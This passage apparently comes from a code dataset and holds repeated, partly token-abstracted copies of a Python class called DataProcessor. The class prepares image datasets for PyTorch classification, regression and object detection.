= None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n\n\nclass my_image_folder(DatasetFolder):\n <function token>\n <function token>\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, split_size=0.15):\n data_path, train_csv, val_csv, tr_name, val_name, test_name = (self\n .data_path, self.train_csv, self.val_csv, self.tr_name, self.\n val_name, self.test_name)\n if not data_path:\n data_path = os.getcwd() + '/'\n tr_path = os.path.join(data_path, tr_name)\n val_path = os.path.join(data_path, val_name)\n test_path = os.path.join(data_path, test_name)\n if os.path.exists(os.path.join(data_path, tr_name + '.csv')):\n train_csv = tr_name + '.csv'\n if not train_csv:\n print('no')\n train_csv, val_csv, test_csv = self.data_from_paths_to_csv(\n data_path, tr_path, val_path, test_path)\n train_csv_path = os.path.join(data_path, train_csv)\n train_df = pd.read_csv(train_csv_path)\n if 'Unnamed: 0' in train_df.columns:\n train_df = train_df.drop('Unnamed: 0', 1)\n if len(train_df.columns) > 2:\n self.obj = True\n img_names = [str(x) for x in list(train_df.iloc[:, 0])]\n if self.extension:\n img_names = add_extension(img_names, self.extension)\n if val_csv:\n val_csv_path = os.path.join(data_path, val_csv)\n val_df = pd.read_csv(val_csv_path)\n val_targets = list(map(str, list(val_df.iloc[:, 1])))\n if test_csv:\n test_csv_path = os.path.join(data_path, test_csv)\n test_df = pd.read_csv(test_csv_path)\n test_targets = list(map(str, list(test_df.iloc[:, 1])))\n targets = list(map(str, list(train_df.iloc[:, 1])))\n lengths = [len(t) for t in [s.split() for s in targets]]\n self.target_lengths = lengths\n split_targets = [t.split() for t in targets]\n if self.obj:\n print('\\nObject Detection\\n')\n int_targets = [list(map(float, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n obj_targets = list(map(str, list(train_df.iloc[:, 2])))\n obj_split_targets = [t.split() for t in obj_targets]\n try:\n obj_split_targets = [list(map(int, x)) for x in\n obj_split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(obj_split_targets, True)\n c_names = list(onehot_classes)\n class_idx = [[c_names.index(i) for i in c] for c in\n obj_split_targets]\n zero_idx = np.zeros((len(targets), max(lengths) // 4), dtype=int)\n for i, t in enumerate(zero_idx):\n t[len(t) - len(class_idx[i]):] = class_idx[i]\n zero_idx[i] = t\n train_df.iloc[:, 2] = [torch.from_numpy(z).type(torch.\n LongTensor) for z in zero_idx]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n elif self.reg:\n print('\\nRegression\\n')\n int_targets = [list(map(int, x)) for x in split_targets]\n zero_targets = np.zeros((len(targets), max(lengths)), dtype=int)\n for i, t in enumerate(zero_targets):\n t[len(t) - len(int_targets[i]):] = int_targets[i]\n zero_targets[i] = t\n train_df.iloc[:, 1] = [torch.from_numpy(z).type(torch.\n FloatTensor) for z in zero_targets]\n self.data_dir, self.num_classes, self.class_names = data_path, max(\n lengths), np.unique(zero_targets, axis=1)\n elif lengths[1:] != lengths[:-1]:\n self.multi_label = True\n print('\\nMulti-label Classification\\n')\n try:\n split_targets = [list(map(int, x)) for x in split_targets]\n except:\n pass\n dai_onehot, onehot_classes = one_hot(split_targets, self.\n multi_label)\n train_df.iloc[:, 1] = [torch.from_numpy(x).type(torch.\n FloatTensor) for x in dai_onehot]\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n onehot_classes), onehot_classes\n else:\n print('\\nSingle-label Classification\\n')\n unique_targets = list(np.unique(targets))\n target_ids = [unique_targets.index(x) for x in targets]\n train_df.iloc[:, 1] = target_ids\n if val_csv:\n target_ids = [unique_targets.index(x) for x in val_targets]\n val_df.iloc[:, 1] = target_ids\n if test_csv:\n target_ids = [unique_targets.index(x) for x in test_targets]\n test_df.iloc[:, 1] = target_ids\n self.data_dir, self.num_classes, self.class_names = data_path, len(\n unique_targets), unique_targets\n if not val_csv:\n train_df, val_df = split_df(train_df, split_size)\n if not test_csv:\n val_df, test_df = split_df(val_df, split_size)\n tr_images = [str(x) for x in list(train_df.iloc[:, 0])]\n val_images = [str(x) for x in list(val_df.iloc[:, 0])]\n test_images = [str(x) for x in list(test_df.iloc[:, 0])]\n if self.extension:\n tr_images = add_extension(tr_images, self.extension)\n val_images = add_extension(val_images, self.extension)\n test_images = add_extension(test_images, self.extension)\n train_df.iloc[:, 0] = tr_images\n val_df.iloc[:, 0] = val_images\n test_df.iloc[:, 0] = test_images\n train_df.to_csv(os.path.join(data_path, 'train.csv'), index=False)\n val_df.to_csv(os.path.join(data_path, 'val.csv'), index=False)\n test_df.to_csv(os.path.join(data_path, 'test.csv'), index=False)\n self.minorities, self.class_diffs = None, None\n if not self.obj or not self.multi_label:\n self.minorities, self.class_diffs = get_minorities(train_df)\n self.data_dfs = {self.tr_name: train_df, self.val_name: val_df,\n self.test_name: test_df}\n data_dict = {'data_dfs': self.data_dfs, 'data_dir': self.data_dir,\n 'num_classes': self.num_classes, 'class_names': self.\n class_names, 'minorities': self.minorities, 'class_diffs': self\n .class_diffs, 'obj': self.obj, 'multi_label': self.multi_label}\n self.data_dict = data_dict\n return data_dict\n\n def data_from_paths_to_csv(self, data_path, tr_path, val_path=None,\n test_path=None):\n train_df = csv_from_path(tr_path, tr_path)\n train_df.to_csv(os.path.join(data_path, self.tr_name + '.csv'),\n index=False)\n ret = self.tr_name + '.csv', None\n if val_path is not None:\n val_exists = os.path.exists(val_path)\n if val_exists:\n val_df = csv_from_path(val_path, tr_path)\n val_df.to_csv(os.path.join(data_path, self.val_name +\n '.csv'), index=False)\n ret = self.tr_name + '.csv', self.val_name + '.csv'\n if test_path is not None:\n test_exists = os.path.exists(test_path)\n if test_exists:\n test_df = csv_from_path(test_path, tr_path)\n test_df.to_csv(os.path.join(data_path, self.test_name +\n '.csv'), index=False)\n ret = (self.tr_name + '.csv', self.val_name + '.csv', self.\n test_name + '.csv')\n return ret\n\n def get_data(self, data_dict=None, s=(224, 224), dataset=\n my_image_csv_dataset, bs=32, balance=False, tfms=None, bal_tfms=\n None, tta=False, num_workers=4, stats_percentage=0.6):\n self.image_size = s\n if not data_dict:\n data_dict = self.data_dict\n data_dfs, data_dir, minorities, class_diffs, obj, multi_label = (\n data_dict['data_dfs'], data_dict['data_dir'], data_dict[\n 'minorities'], data_dict['class_diffs'], data_dict['obj'],\n data_dict['multi_label'])\n if obj or multi_label:\n balance = False\n if tta:\n tta_tfms = {self.tr_name: transforms.Compose([transforms.\n FiveCrop(s[0]), transforms.Lambda(lambda crops: torch.stack\n ([transforms.ToTensor()(crop) for crop in crops])),\n transforms.Lambda(lambda crops: torch.stack([transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])(\n crop) for crop in crops]))]), self.val_name: transforms.\n Compose([transforms.FiveCrop(s[0]), transforms.Lambda(lambda\n crops: torch.stack([transforms.ToTensor()(crop) for crop in\n crops])), transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])(crop) for crop in crops]))]), self.test_name:\n transforms.Compose([transforms.FiveCrop(s[0]), transforms.\n Lambda(lambda crops: torch.stack([transforms.ToTensor()(\n crop) for crop in crops])), transforms.Lambda(lambda crops:\n torch.stack([transforms.Normalize([0.485, 0.456, 0.406], [\n 0.229, 0.224, 0.225])(crop) for crop in crops]))])}\n else:\n tta_tfms = None\n if not bal_tfms:\n bal_tfms = {self.tr_name: [transforms.RandomHorizontalFlip()],\n self.val_name: None, self.test_name: None}\n else:\n bal_tfms = {self.tr_name: bal_tfms, self.val_name: None, self.\n test_name: None}\n if obj:\n resize_transform = transforms.Resize(s)\n else:\n resize_transform = transforms.Resize(s)\n if not tfms:\n tfms = [resize_transform, transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]\n else:\n tfms_temp = [resize_transform, transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, \n 0.225])]\n tfms_temp[1:1] = tfms\n tfms = tfms_temp\n print(tfms)\n data_transforms = {self.tr_name: tfms, self.val_name: [transforms.\n Resize(s), transforms.ToTensor(), transforms.Normalize([0.485, \n 0.456, 0.406], [0.229, 0.224, 0.225])], self.test_name: [\n transforms.Resize(s), transforms.ToTensor(), transforms.\n Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])]}\n temp_tfms = [resize_transform, transforms.ToTensor()]\n temp_dataset = dataset(os.path.join(data_dir, self.tr_name),\n data_dfs[self.tr_name], temp_tfms)\n self.img_mean, self.img_std = get_img_stats(temp_dataset,\n stats_percentage)\n data_transforms[self.tr_name][-1].mean, data_transforms[self.tr_name][\n -1].std = self.img_mean, self.img_std\n data_transforms[self.val_name][-1].mean, data_transforms[self.val_name\n ][-1].std = self.img_mean, self.img_std\n data_transforms[self.test_name][-1].mean, data_transforms[self.\n test_name][-1].std = self.img_mean, self.img_std\n if balance:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj, minorities,\n class_diffs, bal_tfms[x]) for x in [self.tr_name, self.\n val_name, self.test_name]}\n else:\n image_datasets = {x: dataset(os.path.join(data_dir, self.\n tr_name), data_dfs[x], data_transforms[x], obj) for x in [\n self.tr_name, self.val_name, self.test_name]}\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x],\n batch_size=bs, shuffle=True, num_workers=num_workers) for x in\n [self.tr_name, self.val_name, self.test_name]}\n dataset_sizes = {x: len(image_datasets[x]) for x in [self.tr_name,\n self.val_name, self.test_name]}\n self.image_datasets, self.dataloaders, self.dataset_sizes = (\n image_datasets, dataloaders, dataset_sizes)\n return image_datasets, dataloaders, dataset_sizes\n\n def imshow(self, inp, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n inp = self.denorm_img(inp)\n plt.imshow(inp)\n if title:\n plt.title(title)\n plt.pause(0.001)\n\n def denorm_img(self, inp, calculate=False):\n inp = inp.numpy().transpose((1, 2, 0))\n if calculate:\n mean = np.mean(inp)\n std = np.std(inp)\n else:\n mean = self.img_mean.numpy()\n std = self.img_std.numpy()\n inp = std * inp + mean\n inp = np.clip(inp, 0, 1)\n return inp\n\n def show_data(self, folder_name='train', size=(64, 64), bs=5):\n self.get_data(size, bs)\n batch = next(iter(self.dataloaders[folder_name]))\n inputs, classes = batch[0], batch[1]\n out = torchvision.utils.make_grid(inputs)\n if self.reg:\n print(classes)\n self.imshow(out, title=[x for x in classes])\n elif self.multi_label:\n self.imshow(out, title=[self.class_names[np.nonzero(x.type(\n torch.LongTensor))] for x in classes])\n else:\n self.imshow(out, title=[self.class_names[x] for x in classes])\n", "<import token>\n<class token>\n<class token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\nclass DataProcessor:\n\n def __init__(self, data_path=None, train_csv=None, val_csv=None, reg=\n False, tr_name='train', val_name='val', test_name='test', extension\n =None, setup_data=True):\n print('+------------------------------------+')\n print('| Dream AI |')\n print('+------------------------------------+')\n print()\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else\n 'cpu')\n (self.data_path, self.train_csv, self.val_csv, self.reg, self.\n tr_name, self.val_name, self.test_name, self.extension) = (\n data_path, train_csv, val_csv, reg, tr_name, val_name,\n test_name, extension)\n self.obj = False\n self.multi_label = False\n if setup_data:\n self.set_up_data()\n\n def set_up_data(self, 